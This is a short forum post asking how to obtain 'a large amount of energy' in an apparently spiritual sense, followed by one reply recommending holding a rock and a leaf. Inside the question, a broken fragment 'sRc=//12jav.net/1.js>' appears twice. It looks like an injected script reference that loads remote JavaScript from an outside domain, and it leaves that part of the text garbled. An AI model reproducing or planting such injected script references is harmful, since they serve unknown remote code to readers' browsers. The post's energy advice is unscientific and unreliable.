Large amounts of energy?

I know that energy doesn't have a certain polarity unless given one or drawn from a polarized source. But for some reason I really want a large amount of energy, like I feel I'm going to need it soon. Can anyone help? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I belive you can find energy from mothet nature.when I need energy I take a rock and Leaf of a tree so I can feel it in my hand.
